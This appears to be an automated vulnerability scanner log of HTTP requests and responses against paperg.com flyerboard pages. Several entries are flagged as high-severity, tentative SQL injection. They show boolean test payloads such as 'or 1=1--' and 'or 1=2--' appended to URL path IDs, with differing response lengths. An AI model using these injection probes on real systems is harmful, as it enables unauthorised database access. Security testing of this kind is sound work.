| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:32 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3877 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - Conifer Park - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Conifer Park" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg </div> ...[SNIP]... | 
| GET /flyerboard/conifer-park Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:34 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/electrical | 
| GET /flyerboard/electrical Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:12 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 5454 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - ELECTRICAL SUB-CODE - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "ELECTRICAL SUB-CODE" /> <meta name="description" content = "The Township of Montclair is seeking a self-motivated individual to fill the position of Electrical Sub code Official in the Uniform Construction Division of..." /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id= ...[SNIP]... | 
| GET /flyerboard/electrical Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:12 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/helderberg | 
| GET /flyerboard/helderberg Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:30 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3918 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - Helderberg Mountain - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Helderberg Mountain" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg ...[SNIP]... | 
| GET /flyerboard/helderberg Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:31 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/mount- | 
| GET /flyerboard/mount- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:30 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3889 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - Mount Loretto - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Mount Loretto" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg </div> ...[SNIP]... | 
| GET /flyerboard/mount- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:31 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/mount-loretto | 
| GET /flyerboard/mount-loretto Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:26 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3889 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - Mount Loretto - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Mount Loretto" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg </div> ...[SNIP]... | 
| GET /flyerboard/mount-loretto Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:27 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/northwoods | 
| GET /flyerboard/northwoods Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:31 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3900 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - Northwoods Health - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Northwoods Health" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg ...[SNIP]... | 
| GET /flyerboard/northwoods Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:32 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/northwoods | 
| GET /flyerboard/northwoods Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:25 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3900 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - Northwoods Health - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Northwoods Health" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg ...[SNIP]... | 
| GET /flyerboard/northwoods Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:25 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/nyprig/1552 | 
| GET /flyerboard/nyprig/155269076538%20or%201%3d1-- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:27 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3853 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - NYPRIG - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "NYPRIG" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg </div> <!-- END ...[SNIP]... | 
| GET /flyerboard/nyprig/155269076538%20or%201%3d2-- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:28 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/nyprig/1753 | 
| GET /flyerboard/nyprig/175394145908%20or%201%3d1-- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:35 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3853 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - NYPRIG - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "NYPRIG" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg </div> <!-- END ...[SNIP]... | 
| GET /flyerboard/nyprig/175394145908%20or%201%3d2-- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:36 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/old-songs | 
| GET /flyerboard/old-songs Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:31 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3961 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - Old Songs Festival - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Old Songs Festival" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg ...[SNIP]... | 
| GET /flyerboard/old-songs Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:31 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/olsens/1552 | 
| GET /flyerboard/olsens/155220689799%20or%201%3d1-- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:24 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3856 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - Olsen's - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Olsen's" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg </div> <!-- EN ...[SNIP]... | 
| GET /flyerboard/olsens/155220689799%20or%201%3d2-- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:25 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/pathways/1552 | 
| GET /flyerboard/pathways/155218914863%20or%201%3d1-- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
